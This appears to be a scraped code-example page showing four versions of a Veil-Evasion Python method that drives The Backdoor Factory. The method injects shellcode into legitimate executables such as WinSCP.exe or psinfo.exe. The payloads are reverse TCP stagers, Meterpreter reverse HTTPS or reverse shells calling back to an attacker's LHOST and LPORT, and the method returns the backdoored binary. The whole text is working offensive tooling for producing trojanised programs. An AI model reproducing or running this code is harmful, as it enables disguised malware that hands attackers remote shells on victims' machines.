Exemple #1
0
    def generate(self):
        #Because of calling BDF via classes, obsolute paths change
        if self.required_options["orig_exe"][0] == "WinSCP.exe":
            self.required_options["orig_exe"][
                0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"

        #Make sure the bin is supported
        self.basicDiscovery()

        if self.required_options["payload"][0] == "custom":

            Shellcode = self.shellcode.generate()

            raw = Shellcode.decode("string_escape")

            f = open(settings.TEMP_DIR + "shellcode.raw", 'wb')
            f.write(raw)
            f.close()
            print "shellcode", settings.TEMP_DIR + "shellcode.raw"
            #invoke the class for the associated binary
            if self.type == 'PE':
                targetFile = pebin.pebin(
                    FILE=self.required_options["orig_exe"][0],
                    OUTPUT='payload.exe',
                    SHELL='user_supplied_shellcode',
                    SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
                self.extension = "exe"

            elif self.type == 'ELF':
                targetFile = elfbin.elfbin(
                    FILE=self.required_options["orig_exe"][0],
                    OUTPUT='payload.exe',
                    SHELL='user_supplied_shellcode',
                    SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
                self.extension = ""
            else:
                print "\nInvalid File or File Type Submitted, try again.\n"
                return ""

        else:

            shellcodeChoice = ""
            if self.required_options["payload"][0] == "meter_tcp":
                shellcodeChoice = "reverse_tcp_stager"
            elif self.required_options["payload"][
                    0] == "meter_https" and self.type == "PE":
                shellcodeChoice = "meterpreter_reverse_https"
            elif self.required_options["payload"][0] == "rev_shell":
                shellcodeChoice = "reverse_shell_tcp"
            else:
                print helpers.color(
                    "\n [!] Please enter a valid payload choice.",
                    warning=True)
                raw_input("\n [>] Press any key to return to the main menu:")
                return ""

            # invoke the class for the associated binary
            if self.type == 'PE':
                targetFile = pebin.pebin(
                    FILE=self.required_options["orig_exe"][0],
                    OUTPUT='payload.exe',
                    SHELL=shellcodeChoice,
                    HOST=self.required_options["LHOST"][0],
                    PORT=int(self.required_options["LPORT"][0]))
                self.extension = "exe"
            elif self.type == 'ELF':
                targetFile = elfbin.elfbin(
                    FILE=self.required_options["orig_exe"][0],
                    OUTPUT='payload.exe',
                    SHELL=shellcodeChoice,
                    HOST=self.required_options["LHOST"][0],
                    PORT=int(self.required_options["LPORT"][0]))
                self.extension = ""
            else:
                print "\nInvalid File or File Type Submitted, try again.\n"
                return ""

        print helpers.color("\n[*] Running The Backdoor Factory...")

        try:
            #PATCH STUFF
            try:
                targetFile.run_this()
            except SystemExit as e:
                #I use sys.exits in BDF, so not to leave Veil
                print "\nBackdoorFactory Error, check options and binary\n"
                return ""
            #Because shits fast yo
            time.sleep(4)

            # read in the output .exe from /tmp/
            f = open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe",
                     'rb')
            PayloadCode = f.read()
            f.close()

        except IOError:
            print "\nError during The Backdoor Factory execution\n"
            raw_input("\n[>] Press any key to return to the main menu:")
            return ""

        try:
            #remove backdoored/ in VEIL root
            shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')

        except Exception as e:
            #quiet failure
            pass

        return PayloadCode
    def generate(self):
        #Because of calling BDF via classes, absolute paths change
        if self.required_options["orig_exe"][0] == "WinSCP.exe":
            self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"

        #Make sure the bin is supported
        self.basicDiscovery()

        if self.required_options["payload"][0] == "custom":

            Shellcode = self.shellcode.generate()

            raw = Shellcode.decode("string_escape")
            with open(settings.TEMP_DIR + "shellcode.raw", 'wb') as f:
                f.write(raw)

            print "shellcode", settings.TEMP_DIR + "shellcode.raw"
            #invoke the class for the associated binary
            if self.type == 'PE':
                targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe',
                                         SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw",
                                         PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
                self.extension = "exe"
            elif self.type == 'ELF':
                targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
                self.extension = ""
            else:
                print "\nInvalid File or File Type Submitted, try again.\n"
                return ""

        else:

            shellcodeChoice = self.required_options['payload'][0]

            # invoke the class for the associated binary
            if self.type == 'PE':
                targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe',
                                         SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0],
                                         PORT=int(self.required_options["LPORT"][0]),
                                         PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
                self.extension = "exe"
            elif self.type == 'ELF':
                targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0],
                                           OUTPUT='payload.exe', SHELL=shellcodeChoice,
                                           HOST=self.required_options["LHOST"][0],
                                           PORT=int(self.required_options["LPORT"][0]))
                self.extension = ""
            else:
                print "\nInvalid File or File Type Submitted, try again.\n"
                return ""

        print helpers.color("\n[*] Running The Backdoor Factory...")

        #PATCH STUFF
        try:
            targetFile.run_this()
        except:
            #I use sys.exits in BDF, so not to leave Veil
            print "\nBackdoorFactory Error, check options and binary\n"
            raw_input("\n[>] Press any key to return to the main menu:")
            return ""
        #Because speed
        time.sleep(3)

        try:
            # read in the output .exe from /tmp/
            with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') as f:
                PayloadCode = f.read()

        except IOError:
            print "\nError during The Backdoor Factory execution\n"
            raw_input("\n[>] Press any key to return to the main menu:")
            return ""

        try:
            #remove backdoored/ in VEIL root
            shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')

        except:
            #quiet failure
            pass

        return PayloadCode
Exemple #3
0
    def generate(self):
        #Because of calling BDF via classes, absolute paths change
        if self.required_options["ORIGINAL_EXE"][0] == "WinSCP.exe":
            self.required_options["ORIGINAL_EXE"][
                0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"

        #Make sure the bin is supported
        self.basicDiscovery()

        shellcodeChoice = self.required_options['PAYLOAD'][0]
        #cave_miner_inline
        #iat_reverse_tcp_inline
        #iat_reverse_tcp_inline_threaded
        #iat_reverse_tcp_stager_threaded
        #iat_user_supplied_shellcode_threaded
        #meterpreter_reverse_https_threaded
        #reverse_shell_tcp_inline
        #reverse_tcp_stager_threaded
        #user_supplied_shellcode_threaded
        #if self.type == 'PE':
        #    if not (shellcodeChoice == 'meterpreter_https' and shellcodeChoice == 'meter_https'
        #        and shellcodeChoice == 'meterpreter_tcp'  and shellcodeChoice == 'meter_tcp'
        #        and shellcodeChoice == 'reverse_shell'  and shellcodeChoice == 'rev_shell'
        #        and shellcodeChoice == 'custom'):
        #            print helpers.color("\n [*] Invalid payload: %s..." % shellcodeChoice, warning=True)
        #            return ""
        #elif self.type == 'ELF':
        #    if not (shellcodeChoice == 'meterpreter_tcp'  and shellcodeChoice == 'meter_tcp'
        #        and shellcodeChoice == 'reverse_shell'  and shellcodeChoice == 'rev_shell'
        #        and shellcodeChoice == 'custom'):
        #            print helpers.color("\n[*] Invalid payload: %s..." % shellcodeChoice, warning=True)
        #            return ""
        #else:
        #    print helpers.color("\n[*] Invalid type: %s..." % self.type, warning=True)
        #    return ""

        if shellcodeChoice == "custom":

            Shellcode = self.shellcode.generate(self.required_options)

            raw = Shellcode.decode("string_escape")
            with open(settings.TEMP_DIR + "shellcode.raw", 'wb') as f:
                f.write(raw)

            print "shellcode", settings.TEMP_DIR + "shellcode.raw"
            #invoke the class for the associated binary
            if self.type == 'PE':
                targetFile = pebin.pebin(
                    FILE=self.required_options["ORIGINAL_EXE"][0],
                    OUTPUT='payload.exe',
                    SHELL='user_supplied_shellcode',
                    SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw",
                    PATCH_METHOD=self.required_options["PATCH_METHOD"][0])

                self.extension = "exe"

            elif self.type == 'ELF':
                targetFile = elfbin.elfbin(
                    FILE=self.required_options["ORIGINAL_EXE"][0],
                    OUTPUT='payload.exe',
                    SHELL='user_supplied_shellcode',
                    SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
                self.extension = ""
            else:
                print "\nInvalid File or File Type Submitted, try again.\n"
                return ""

        else:

            # invoke the class for the associated binary
            if self.type == 'PE':
                targetFile = pebin.pebin(
                    FILE=self.required_options["ORIGINAL_EXE"][0],
                    OUTPUT='payload.exe',
                    SHELL=shellcodeChoice,
                    HOST=self.required_options["LHOST"][0],
                    PORT=int(self.required_options["LPORT"][0]),
                    PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
                self.extension = "exe"
            elif self.type == 'ELF':
                targetFile = elfbin.elfbin(
                    FILE=self.required_options["ORIGINAL_EXE"][0],
                    OUTPUT='payload.exe',
                    SHELL=shellcodeChoice,
                    HOST=self.required_options["LHOST"][0],
                    PORT=int(self.required_options["LPORT"][0]))
                self.extension = ""
            else:
                print "\nInvalid File or File Type Submitted, try again.\n"
                return ""

        print helpers.color("\n[*] Running The Backdoor Factory...")

        #PATCH STUFF
        try:
            targetFile.run_this()
        except:
            #I use sys.exits in BDF, so not to leave Veil
            print "\nBackdoorFactory Error, check options and binary\n"
            raw_input("\n[>] Press any key to return to the main menu.")
            return ""
        #Because speed
        time.sleep(3)

        try:
            # read in the output .exe from /tmp/
            with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe",
                      'rb') as f:
                PayloadCode = f.read()

        except IOError:
            print "\nError during The Backdoor Factory execution\n"
            raw_input("\n[>] Press any key to return to the main menu.")
            return ""

        try:
            #remove backdoored/ in VEIL root
            shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored')

        except:
            #quiet failure
            pass

        return PayloadCode
    def generate(self):
	#Because of calling BDF via classes, obsolute paths change
	if self.required_options["orig_exe"][0] == "psinfo.exe":
	   self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/psinfo.exe"
	
	#Make sure the bin is supported
	self.basicDiscovery()

           
	if self.required_options["payload"][0] == "custom":

            Shellcode = self.shellcode.generate()

            raw = Shellcode.decode("string_escape")
            
            f = open(settings.TEMP_DIR + "shellcode.raw", 'wb')
            f.write(raw)
            f.close()
	    print "shellcode", settings.TEMP_DIR + "shellcode.raw"
	    #invoke the class for the associated binary
	    if self.type == 'PE':
		targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
                self.extension = "exe"
	    
	    elif self.type == 'ELF':
		targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw") 
        	self.extension = ""
	    else:
		print "\nInvalid File or File Type Submitted, try again.\n"
		return ""

        else:

            shellcodeChoice = ""
            if self.required_options["payload"][0] == "meter_tcp":
                shellcodeChoice = "reverse_tcp_stager"
            elif self.required_options["payload"][0] == "meter_https" and self.type == "PE":
                shellcodeChoice = "meterpreter_reverse_https"
            elif self.required_options["payload"][0] == "rev_shell":
                shellcodeChoice = "reverse_shell_tcp"
            else:
                print helpers.color("\n [!] Please enter a valid payload choice.", warning=True)
                raw_input("\n [>] Press any key to return to the main menu:")
                return ""

            # invoke the class for the associated binary
	    if self.type == 'PE':
		targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0]))
            	self.extension = "exe"
	    elif self.type == 'ELF':
                targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe',  SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0])) 
		self.extension = ""
	    else:
		print "\nInvalid File or File Type Submitted, try again.\n"
		return ""

        print helpers.color("\n[*] Running The Backdoor Factory...")

        try:
	    #PATCH STUFF
	    try:
	        targetFile.run_this()
            except SystemExit as e:
		#I use sys.exits in BDF, so not to leave Veil
		print "\nBackdoorFactory Error, check options and binary\n"
		return ""
	    #Because shits fast yo
	    time.sleep(4)
	    
	    # read in the output .exe from /tmp/
            f = open(settings.VEIL_EVASION_PATH+"backdoored/payload.exe", 'rb')
            PayloadCode = f.read()
            f.close()

        except IOError:
            print "\nError during The Backdoor Factory execution\n" 
            raw_input("\n[>] Press any key to return to the main menu:")
            return ""

	try:
	    #remove backdoored/ in VEIL root
	    shutil.rmtree(settings.VEIL_EVASION_PATH+'backdoored')

        except Exception as e:
	    #quiet failure
	    pass

	return PayloadCode